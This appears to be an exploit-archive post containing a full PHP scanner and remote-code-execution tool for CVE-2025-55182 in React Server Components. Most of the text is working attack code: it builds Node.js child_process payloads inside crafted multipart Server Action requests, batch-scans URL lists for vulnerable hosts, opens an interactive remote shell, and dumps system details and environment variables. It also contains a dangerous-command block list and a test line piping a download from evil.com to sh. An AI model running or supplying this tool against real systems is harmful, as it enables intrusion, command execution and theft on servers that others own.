============================================================================================================================================= | # Title : React 19.2.0 PHP Scanner & RCE Exploit Tool | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://react.dev | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/212444/ & CVE-2025-55182 [+] Summary : This project delivers a PHP-based vulnerability scanner and remote code execution (RCE) exploit for CVE‑2025‑55182 affecting React Server Components. [+] includes: Target scanning (single/multiple hosts) Vulnerability detection RCE payload execution Interactive remote shell Structured JSON parsing with fallback Multipart form-data payload handling The exploit leverages RSC serialization weaknesses to execute arbitrary commands and validate successful exploitation. [+] POC : init_colors(); // Suppress SSL warnings if (function_exists('stream_context_set_default')) { stream_context_set_default([ 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false, ] ]); } } private function init_colors() { // Check if we're on Windows CMD without ANSI support $is_windows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'; $has_ansi_support = false; if ($is_windows && PHP_SAPI === 'cli') { // Try to detect ANSI support in Windows 10+ $has_ansi_support = (function_exists('sapi_windows_vt100_support') && sapi_windows_vt100_support(STDOUT)) || getenv('ANSICON') !== false || getenv('ConEmuANSI') === 'ON' || getenv('TERM') === 'xterm'; } elseif (!$is_windows) { $has_ansi_support = true; // Unix-like systems usually support ANSI } if ($has_ansi_support) { $this->colors = [ 'HEADER' => "\033[95m", 'BLUE' => "\033[94m", 'GREEN' => "\033[92m", 'WARNING' => "\033[93m", 'FAIL' => "\033[91m", 'ENDC' => "\033[0m", 'BOLD' => "\033[1m", 'CYAN' => "\033[96m", 'MAGENTA' => "\033[95m", 'BG_RED' => "\033[41m" ]; } else { // No colors for unsupported terminals $this->colors = array_fill_keys([ 'HEADER', 'BLUE', 'GREEN', 'WARNING', 'FAIL', 'ENDC', 'BOLD', 'CYAN', 'MAGENTA', 'BG_RED' ], ''); } } private function color($name) { return $this->colors[$name] ?? ''; } private function print_info($msg) { echo $this->color('BLUE') . "[*] " . $msg . $this->color('ENDC') . PHP_EOL; } private function print_success($msg) { echo $this->color('GREEN') . "[+] " . $msg . $this->color('ENDC') . PHP_EOL; } private function print_error($msg) { echo $this->color('FAIL') . "[-] " . $msg . $this->color('ENDC') . PHP_EOL; } private function print_warning($msg) { echo $this->color('WARNING') . "[!] " . $msg . $this->color('ENDC') . PHP_EOL; } private function print_critical($msg) { echo $this->color('BG_RED') . $this->color('BOLD') . "[CRITICAL] " . $msg . $this->color('ENDC') . PHP_EOL; } private function validate_command($cmd) { // Check command length if (strlen($cmd) > $this->max_cmd_length) { $this->print_error("Command too long (max {$this->max_cmd_length} characters)"); return false; } // Block potentially dangerous commands in interactive mode $dangerous_patterns = [ '/\brm\s+-rf\b/i', '/\bmkfs\b/i', '/\bdd\s+if=/i', '/\bchmod\s+777\b/i', '/\bwget\b.*\|\s*sh/i', '/\bcurl\b.*\|\s*sh/i', '/;.*;/', // Multiple command separators '/`.*`/', // Backticks '/\$\s*\(/', // $() syntax '/\|\s*\{/', // Pipe to block ]; foreach ($dangerous_patterns as $pattern) { if (preg_match($pattern, $cmd)) { $this->print_warning("Potentially dangerous command detected and blocked"); return false; } } return true; } private function sanitize_command($cmd) { // Basic sanitization for different command types $cmd = trim($cmd); // Handle echo commands specially - remove quotes if present if (preg_match('/^echo\s+/i', $cmd)) { // Extract the part after echo $echo_content = substr($cmd, 5); $echo_content = trim($echo_content, " \t\n\r\0\x0B\"'"); // Only allow safe characters for echo $echo_content = preg_replace('/[^\w\d\s\-_\.]/', '', $echo_content); return 'echo ' . $echo_content; } // For other commands, allow more characters but still sanitize $cmd = preg_replace('/[^\w\d\s\-_\.\/\\\,:;&|><=\[\]{}()@#!~`\$\+\-\*"\'?]/', '', $cmd); // Limit consecutive special characters $cmd = preg_replace('/([;&|])\1+/', '$1', $cmd); return $cmd; } private function build_payload($cmd) { // Multiple payload variations for different environments $payloads = [ // Primary payload - standard Node.js RCE [ "id" => "vm#runInThisContext", "bound" => ["console.log('RCE_TEST'); process.mainModule.require('child_process').execSync('{$cmd}').toString()"] ], // Alternative payload 1 - Different context [ "id" => "vm#runInNewContext", "bound" => ["global.process.mainModule.require('child_process').execSync('{$cmd}').toString()"] ], // Alternative payload 2 - Using module constructor [ "id" => "module#constructor", "bound" => ["new module.constructor('return process')().mainModule.require('child_process').execSync('{$cmd}').toString()"] ], // Alternative payload 3 - Direct require [ "id" => "global#require", "bound" => ["global.require('child_process').execSync('{$cmd}').toString()"] ] ]; // Return the primary payload (can be modified to try all) return json_encode($payloads[0]); } private function send_payload($url, $cmd, $payload_variant = 0) { // Validate command first if (!$this->validate_command($cmd)) { return [ 'content' => null, 'headers' => [], 'status' => 0, 'success' => false, 'error' => 'Command validation failed' ]; } // Sanitize command $safe_cmd = $this->sanitize_command($cmd); // Build payload based on variant $payload = $this->build_payload($safe_cmd); // Prepare multipart form data $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16)); $content = "--{$boundary}\r\n"; $content .= "Content-Disposition: form-data; name=\"\$ACTION_REF_0\"\r\n\r\n1\r\n"; $content .= "--{$boundary}\r\n"; $content .= "Content-Disposition: form-data; name=\"\$ACTION_0:0\"\r\n\r\n"; $content .= $payload . "\r\n"; $content .= "--{$boundary}--\r\n"; $headers = [ "Content-Type: multipart/form-data; boundary={$boundary}", "User-Agent: {$this->user_agent}", "Accept: */*", "Connection: close", "X-Requested-With: XMLHttpRequest", "Origin: " . parse_url($url, PHP_URL_SCHEME) . "://" . parse_url($url, PHP_URL_HOST) ]; $context = stream_context_create([ 'http' => [ 'method' => 'POST', 'header' => implode("\r\n", $headers), 'content' => $content, 'timeout' => $this->timeout, 'ignore_errors' => true ], 'ssl' => [ 'verify_peer' => $this->verify_ssl, 'verify_peer_name' => $this->verify_ssl ] ]); try { $start_time = microtime(true); $response = @file_get_contents($url, false, $context); $response_time = round((microtime(true) - $start_time) * 1000, 2); $http_response_header = $http_response_header ?? []; return [ 'content' => $response, 'headers' => $http_response_header, 'status' => $this->get_http_status($http_response_header), 'success' => $response !== false, 'response_time' => $response_time, 'payload_variant' => $payload_variant, 'error' => $response === false ? error_get_last()['message'] ?? 'Unknown error' : null ]; } catch (Exception $e) { $this->print_error("Connection error: " . $e->getMessage()); return [ 'content' => null, 'headers' => [], 'status' => 0, 'success' => false, 'response_time' => 0, 'error' => $e->getMessage() ]; } } private function get_http_status($headers) { if (empty($headers)) return 0; $status_line = $headers[0]; preg_match('/HTTP\/\d\.\d\s+(\d+)/', $status_line, $matches); return isset($matches[1]) ? (int)$matches[1] : 0; } private function generate_token($length = 16) { $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; $token = ''; for ($i = 0; $i < $length; $i++) { $token .= $chars[random_int(0, strlen($chars) - 1)]; } return $token; } private function extract_result_from_response($content, $token = null) { $result = [ 'type' => 'unknown', 'result' => null, 'error' => null, 'token_found' => false, 'json_valid' => false, 'raw_preview' => substr($content, 0, 200) . (strlen($content) > 200 ? '...' : '') ]; // Method 1: Try JSON parsing first if (!empty($content)) { $json_data = @json_decode($content, true); if (json_last_error() === JSON_ERROR_NONE) { $result['json_valid'] = true; $result['type'] = 'json'; $result['full_json'] = $json_data; if (isset($json_data['result'])) { $result['result'] = $json_data['result']; } if (isset($json_data['error'])) { $result['error'] = $json_data['error']; } if (isset($json_data['message'])) { $result['error'] = $json_data['message']; } } } // Method 2: Look for token in raw response if ($token !== null && !empty($content)) { if (strpos($content, $token) !== false) { $result['token_found'] = true; $result['type'] = $result['type'] === 'unknown' ? 'raw' : $result['type']; // Extract context around token $pos = strpos($content, $token); $start = max(0, $pos - 100); $end = min(strlen($content), $pos + 100); $context = substr($content, $start, $end - $start); if (empty($result['result'])) { $result['result'] = $context; } } } // Method 3: Try to extract from common patterns if (empty($result['result']) && !empty($content)) { $patterns = [ '/result["\']?\s*:\s*["\']?([^"\',}]+)/i', '/output["\']?\s*:\s*["\']?([^"\',}]+)/i', '/data["\']?\s*:\s*["\']?([^"\',}]+)/i', '/]*>([^<]+)<\/pre>/i', '/]*>([^<]+)<\/code>/i' ]; foreach ($patterns as $pattern) { if (preg_match($pattern, $content, $matches)) { $result['result'] = trim($matches[1]); $result['type'] = 'pattern'; break; } } } return $result; } public function scan($url, $detailed = false) { $this->print_info("Scanning {$url} for CVE-2025-55182..."); $token = $this->generate_token(16); $cmd = "echo " . $token; // No quotes needed for echo $response = $this->send_payload($url, $cmd); if (!$response['success'] || $response['content'] === null) { $this->print_error("Failed to connect to target."); $this->print_info("Error: " . ($response['error'] ?? 'Unknown')); $this->print_info("Response time: {$response['response_time']}ms"); return false; } $content = $response['content']; $analysis = $this->extract_result_from_response($content, $token); if ($detailed) { $this->print_info("=== Detailed Analysis ==="); $this->print_info("Response type: " . $analysis['type']); $this->print_info("HTTP Status: " . $response['status']); $this->print_info("Response time: {$response['response_time']}ms"); $this->print_info("JSON valid: " . ($analysis['json_valid'] ? 'Yes' : 'No')); $this->print_info("Token found: " . ($analysis['token_found'] ? 'Yes' : 'No')); if ($analysis['error']) { $this->print_warning("Server error: " . $analysis['error']); } } // Check for vulnerability $is_vulnerable = false; $confidence = 'low'; // High confidence: Token found in JSON result if ($analysis['type'] === 'json' && $analysis['result'] && strpos($analysis['result'], $token) !== false) { $is_vulnerable = true; $confidence = 'high'; $this->print_success("HIGH CONFIDENCE: Token found in JSON result"); } // Medium confidence: Token found in raw response elseif ($analysis['token_found']) { $is_vulnerable = true; $confidence = 'medium'; $this->print_success("MEDIUM CONFIDENCE: Token found in raw response"); } // Low confidence: Response looks like RCE output but no token elseif ($analysis['result'] && preg_match('/\b(root|admin|www-data|user)\b/i', $analysis['result'])) { $is_vulnerable = true; $confidence = 'low'; $this->print_warning("LOW CONFIDENCE: RCE-like output detected"); } if ($is_vulnerable) { $this->print_success("Target appears to be VULNERABLE (confidence: {$confidence})!"); if ($analysis['result']) { $output = trim($analysis['result']); $output_preview = strlen($output) > 100 ? substr($output, 0, 100) . '...' : $output; $this->print_info("Output preview: " . $output_preview); } // Try to get more info if detailed scan if ($detailed) { $this->print_info("Gathering system information..."); $info_cmds = [ 'whoami' => 'Current user', 'uname -a || ver' => 'System info', 'pwd' => 'Current directory', 'id || whoami /all' => 'User details' ]; foreach ($info_cmds as $cmd => $desc) { $resp = $this->send_payload($url, $cmd); if ($resp['success'] && $resp['content']) { $info = $this->extract_result_from_response($resp['content']); if ($info['result']) { $clean_result = trim(preg_replace('/\s+/', ' ', $info['result'])); $this->print_info("{$desc}: " . substr($clean_result, 0, 80)); } } usleep(50000); // 50ms delay } } return ['vulnerable' => true, 'confidence' => $confidence]; } else { $this->print_warning("Target does not appear to be vulnerable."); if ($detailed) { $this->print_info("Response preview: " . $analysis['raw_preview']); } return ['vulnerable' => false, 'confidence' => 'none']; } } public function exploit($url) { $this->print_critical("=== EXPLOIT MODE ACTIVATED ==="); $this->print_warning("You are about to exploit a vulnerable system."); $this->print_warning("Make sure you have proper authorization!"); // Initial scan with details $scan_result = $this->scan($url, true); if (!$scan_result['vulnerable']) { $this->print_error("Target is not vulnerable or confidence is too low."); $this->print_info("Would you like to proceed anyway? (yes/no): "); $response = trim(fgets(STDIN)); if (strtolower($response) !== 'yes') { $this->print_info("Exploit cancelled."); return; } $this->print_warning("Proceeding with low-confidence target..."); } $this->print_success("Starting interactive shell on {$url}"); $this->print_info("Type 'help' for available commands, 'exit' to quit."); // Get initial system info $sysinfo = $this->get_system_info($url); $user = $sysinfo['user'] ?? 'unknown'; $hostname = $sysinfo['hostname'] ?? 'unknown'; $platform = $sysinfo['platform'] ?? 'unknown'; // Interactive shell loop $command_history = []; while (true) { // Build prompt with colors $prompt = $this->color('GREEN') . $user . "@" . $hostname . $this->color('ENDC') . " [" . $this->color('CYAN') . $platform . $this->color('ENDC') . "] " . $this->color('BLUE') . $this->color('BOLD') . "> " . $this->color('ENDC'); echo $prompt; // Get command input if (function_exists('readline')) { readline_completion_function(function($input, $index) { $commands = ['help', 'exit', 'clear', 'sysinfo', 'history', 'pwd', 'ls', 'cd', 'cat', 'whoami', 'id']; return array_filter($commands, function($cmd) use ($input) { return stripos($cmd, $input) === 0; }); }); $cmd = readline(); if ($cmd !== '') { readline_add_history($cmd); $command_history[] = $cmd; } } else { $cmd = trim(fgets(STDIN)); if (!empty($cmd)) { $command_history[] = $cmd; } } // Handle exit if (strtolower($cmd) === 'exit' || strtolower($cmd) === 'quit') { $this->print_info("Exiting interactive shell..."); break; } // Handle empty command if (empty($cmd)) { continue; } // Handle special commands switch (strtolower($cmd)) { case 'help': $this->show_help(); continue 2; case 'clear': case 'cls': system(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'cls' : 'clear'); continue 2; case 'history': $this->show_history($command_history); continue 2; case 'sysinfo': $this->show_sysinfo($url); continue 2; case 'safe': $this->print_info("Safe mode enabled - blocking dangerous commands"); $this->print_info("Current restrictions: rm, mkfs, dd, chmod 777, wget|sh, curl|sh"); continue 2; } // Validate command length if (strlen($cmd) > $this->max_cmd_length) { $this->print_error("Command too long (max {$this->max_cmd_length} characters)"); $this->print_info("Tip: Use redirects or split complex commands"); continue; } // Execute command $start_time = microtime(true); $response = $this->send_payload($url, $cmd); $exec_time = round((microtime(true) - $start_time) * 1000, 2); if ($response['success'] && $response['content']) { $analysis = $this->extract_result_from_response($response['content']); if ($analysis['result']) { echo trim($analysis['result']) . PHP_EOL; $this->print_info("Execution time: {$exec_time}ms | HTTP: {$response['status']}"); } elseif ($analysis['error']) { $this->print_error("Server error: " . $analysis['error']); } else { $this->print_warning("Command executed but no output returned."); $this->print_info("Response type: " . $analysis['type']); } } else { $this->print_error("Command failed or no response."); $this->print_info("Status: {$response['status']} | Time: {$response['response_time']}ms"); if ($response['error']) { $this->print_info("Error: " . $response['error']); } } // Small delay to avoid overwhelming the target usleep(100000); // 100ms } $this->print_info("Session ended. Total commands executed: " . count($command_history)); } private function get_system_info($url) { $info = [ 'user' => 'unknown', 'hostname' => 'unknown', 'platform' => 'unknown' ]; // Try multiple commands to get info $commands = [ 'whoami' => 'user', 'hostname || hostname' => 'hostname', 'uname -s -r -m || ver || systeminfo | findstr /B /C:"OS"' => 'platform' ]; foreach ($commands as $cmd => $key) { $resp = $this->send_payload($url, $cmd); if ($resp['success'] && $resp['content']) { $analysis = $this->extract_result_from_response($resp['content']); if ($analysis['result']) { $info[$key] = trim($analysis['result']); } } usleep(50000); // 50ms delay } return $info; } private function show_help() { $help = [ 'Basic Commands:' => [ 'help' => 'Show this help message', 'exit, quit' => 'Exit the interactive shell', 'clear, cls' => 'Clear the terminal screen', 'history' => 'Show command history', 'sysinfo' => 'Display detailed system information', 'safe' => 'Show safe mode restrictions' ], 'File Operations:' => [ 'pwd' => 'Print working directory', 'ls, ls -la, dir' => 'List directory contents', 'cat ' => 'View file contents', 'cd ' => 'Change directory (note: may not persist)' ], 'System Info:' => [ 'whoami' => 'Current user', 'id' => 'User ID and groups', 'uname -a' => 'System information', 'ps aux' => 'Running processes', 'netstat -an' => 'Network connections' ], 'Tips:' => [ 'Command chaining' => 'Use && for sequential commands', 'Output redirection' => 'Use > to save output to file', 'Pipes' => 'Use | to chain commands', 'Background jobs' => 'Use & to run in background' ] ]; foreach ($help as $section => $commands) { $this->print_info("\n{$section}"); foreach ($commands as $cmd => $desc) { echo " " . str_pad($cmd, 25) . " - " . $desc . PHP_EOL; } } } private function show_history($history) { if (empty($history)) { $this->print_info("No command history yet."); return; } $this->print_info("Command History:"); foreach ($history as $index => $cmd) { echo " [" . ($index + 1) . "] " . $cmd . PHP_EOL; } } private function show_sysinfo($url) { $this->print_info("Gathering detailed system information..."); $checks = [ 'System' => 'uname -a || ver', 'Kernel' => 'cat /proc/version 2>/dev/null || systeminfo | findstr /B /C:"OS"', 'CPU' => 'cat /proc/cpuinfo 2>/dev/null || wmic cpu get name', 'Memory' => 'free -h 2>/dev/null || wmic memorychip get capacity', 'Disk' => 'df -h 2>/dev/null || wmic logicaldisk get size,freespace,caption', 'Network' => 'ifconfig 2>/dev/null || ipconfig /all', 'Users' => 'who 2>/dev/null || query user', 'Processes' => 'ps aux | head -20 2>/dev/null || tasklist', 'Environment' => 'env 2>/dev/null || set', 'Packages' => 'dpkg -l 2>/dev/null || rpm -qa 2>/dev/null || pacman -Q' ]; foreach ($checks as $name => $cmd) { $resp = $this->send_payload($url, $cmd); if ($resp['success'] && $resp['content']) { $analysis = $this->extract_result_from_response($resp['content']); if ($analysis['result']) { $output = trim($analysis['result']); $preview = substr($output, 0, 100); $this->print_info("{$name}: " . $preview . (strlen($output) > 100 ? '...' : '')); } } usleep(100000); // 100ms delay } } public function batch_scan($file_path, $output_report = true) { if (!file_exists($file_path)) { $this->print_error("File not found: {$file_path}"); return; } $urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); if (!$urls) { $this->print_error("No URLs found in file."); return; } $this->print_info("Loaded " . count($urls) . " URLs from {$file_path}"); $this->print_warning("Batch scan starting. This may take a while..."); $results = [ 'high_confidence' => [], 'medium_confidence' => [], 'low_confidence' => [], 'not_vulnerable' => [], 'errors' => [] ]; $start_time = time(); foreach ($urls as $index => $url) { $url = trim($url); if (empty($url)) continue; $current = $index + 1; $total = count($urls); $percent = round(($current / $total) * 100, 1); $elapsed = time() - $start_time; $eta = $total > 0 ? round(($elapsed / $current) * ($total - $current)) : 0; $this->print_info("Scanning [{$current}/{$total}] ({$percent}%) ETA: {$eta}s - {$url}"); try { $result = $this->scan($url, false); if ($result['vulnerable']) { switch ($result['confidence']) { case 'high': $results['high_confidence'][] = $url; break; case 'medium': $results['medium_confidence'][] = $url; break; case 'low': $results['low_confidence'][] = $url; break; } } else { $results['not_vulnerable'][] = $url; } } catch (Exception $e) { $results['errors'][] = $url . " - " . $e->getMessage(); } // Progress delay usleep(300000); // 300ms } // Generate report $this->print_info("\n" . str_repeat("=", 60)); $this->print_info("BATCH SCAN COMPLETE"); $this->print_info("Total time: " . (time() - $start_time) . " seconds"); $this->print_info(str_repeat("-", 60)); $categories = [ 'high_confidence' => ['High Confidence Vulnerable', $this->color('GREEN')], 'medium_confidence' => ['Medium Confidence Vulnerable', $this->color('WARNING')], 'low_confidence' => ['Low Confidence Vulnerable', $this->color('CYAN')], 'not_vulnerable' => ['Not Vulnerable', $this->color('FAIL')], 'errors' => ['Errors', $this->color('FAIL')] ]; foreach ($categories as $key => [$label, $color]) { $count = count($results[$key]); echo $color . "[*] " . str_pad($label, 30) . ": " . $count . $this->color('ENDC') . PHP_EOL; } // Save report if requested if ($output_report) { $report_file = 'cve_scan_report_' . date('Y-m-d_H-i-s') . '.txt'; $report_content = "CVE-2025-55182 Scan Report\n"; $report_content .= "Generated: " . date('Y-m-d H:i:s') . "\n"; $report_content .= "Total URLs: " . count($urls) . "\n\n"; foreach ($categories as $key => [$label, $color]) { $report_content .= "\n=== {$label} ===\n"; foreach ($results[$key] as $item) { $report_content .= $item . "\n"; } } file_put_contents($report_file, $report_content); $this->print_success("Detailed report saved to: {$report_file}"); } return $results; } private function print_banner() { $banner = $this->color('HEADER') . $this->color('BOLD') . " ╔══════════════════════════════════════════════════════════╗ ║ CVE-2025-55182 Scanner & Exploit Tool ║ ║ React Server Components RCE Vulnerability ║ ╚══════════════════════════════════════════════════════════╝" . $this->color('ENDC') . " " . $this->color('CYAN') . "[*] Features:" . $this->color('ENDC') . " • Multi-payload support for different environments • Command validation and sanitization • Confidence-based vulnerability detection • Interactive shell with command history • Batch scanning with detailed reporting • Safe mode to prevent dangerous commands " . $this->color('WARNING') . "[!] SECURITY WARNING:" . $this->color('ENDC') . " • This tool is for AUTHORIZED security testing ONLY • Unauthorized use is ILLEGAL and UNETHICAL • Use only on systems you OWN or have PERMISSION to test " . $this->color('FAIL') . $this->color('BOLD') . "[!] LEGAL NOTICE: You are responsible for your actions!" . $this->color('ENDC') . " "; echo $banner . PHP_EOL; } public function run() { $this->print_banner(); if (PHP_SAPI !== 'cli') { $this->print_error("This tool must be run from command line."); echo "For web interface, use the separate web version." . PHP_EOL; exit(1); } global $argv; if (count($argv) < 2) { $this->show_help(); exit(1); } $mode = $argv[1]; switch ($mode) { case 'scan': if (isset($argv[2]) && $argv[2] === '-u' && isset($argv[3])) { $this->scan($argv[3], true); } elseif (isset($argv[2]) && $argv[2] === '-f' && isset($argv[3])) { $this->batch_scan($argv[3]); } else { $this->show_help(); } break; case 'exploit': if (isset($argv[2]) && $argv[2] === '-u' && isset($argv[3])) { $this->exploit($argv[3]); } else { $this->show_help(); } break; case 'test': $this->test_mode(); break; case 'help': case '--help': case '-h': $this->show_help(); break; default: $this->print_error("Unknown mode: {$mode}"); $this->show_help(); exit(1); } } private function test_mode() { $this->print_info("Running comprehensive self-test..."); // Test token generation $token = $this->generate_token(10); $this->print_success("Token generation: OK ({$token})"); // Test command validation $test_cmds = [ 'echo test' => true, 'whoami' => true, 'ls -la' => true, str_repeat('a', 201) => false, // Too long 'rm -rf /' => false, // Dangerous 'wget http://evil.com | sh' => false // Dangerous pattern ]; foreach ($test_cmds as $cmd => $expected) { $result = $this->validate_command($cmd); $status = $result === $expected ? 'OK' : 'FAIL'; $color = $result === $expected ? 'GREEN' : 'FAIL'; echo $this->color($color) . "[TEST] Command validation '{$cmd}': {$status}" . $this->color('ENDC') . PHP_EOL; } // Test payload building $payload = $this->build_payload('test'); $json_test = json_decode($payload, true); $this->print_success("Payload building: " . (json_last_error() === JSON_ERROR_NONE ? 'OK' : 'FAIL')); // Test required functions $required = ['json_encode', 'file_get_contents', 'random_bytes', 'preg_match']; $all_ok = true; foreach ($required as $func) { if (!function_exists($func)) { $this->print_error("Missing function: {$func}"); $all_ok = false; } } if ($all_ok) { $this->print_success("All required functions available"); } $this->print_info("Self-test completed."); } private function show_help() { echo $this->color('BOLD') . "CVE-2025-55182 Enhanced Scanner & Exploit Tool" . $this->color('ENDC') . PHP_EOL; echo $this->color('CYAN') . "Version: 2.0 | Enhanced Security Edition" . $this->color('ENDC') . PHP_EOL . PHP_EOL; echo "Usage:" . PHP_EOL; echo " php " . basename(__FILE__) . " [mode] [options]" . PHP_EOL . PHP_EOL; echo "Modes:" . PHP_EOL; echo " scan - Check target vulnerability (detailed analysis)" . PHP_EOL; echo " exploit - Interactive exploit shell (requires vulnerable target)" . PHP_EOL; echo " test - Run self-test to verify functionality" . PHP_EOL; echo " help - Show this help message" . PHP_EOL . PHP_EOL; echo "Scan Options:" . PHP_EOL; echo " -u URL - Single target URL (detailed scan)" . PHP_EOL; echo " -f FILE - File containing list of URLs (batch scan)" . PHP_EOL . PHP_EOL; echo "Exploit Options:" . PHP_EOL; echo " -u URL - Target URL to exploit (interactive shell)" . PHP_EOL . PHP_EOL; echo "Security Features:" . PHP_EOL; echo " • Command length limitation (max 200 chars)" . PHP_EOL; echo " • Dangerous command blocking" . PHP_EOL; echo " • Confidence-based vulnerability detection" . PHP_EOL; echo " • Safe mode for interactive shell" . PHP_EOL . PHP_EOL; echo "Examples:" . PHP_EOL; echo " php " . basename(__FILE__) . " scan -u https://target.com/api" . PHP_EOL; echo " php " . basename(__FILE__) . " scan -f targets.txt" . PHP_EOL; echo " php " . basename(__FILE__) . " exploit -u https://target.com/api" . PHP_EOL; echo " php " . basename(__FILE__) . " test" . PHP_EOL; echo $this->color('WARNING') . PHP_EOL . "[!] Legal Notice: For authorized testing only!" . $this->color('ENDC') . PHP_EOL; echo $this->color('FAIL') . "[!] By using this tool, you accept full responsibility for your actions." . $this->color('ENDC') . PHP_EOL; } } // Main execution if (PHP_SAPI === 'cli' && isset($argv[0]) && basename($argv[0]) === basename(__FILE__)) { $scanner = new CVE_2025_55182_Scanner_Secure(); $scanner->run(); } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================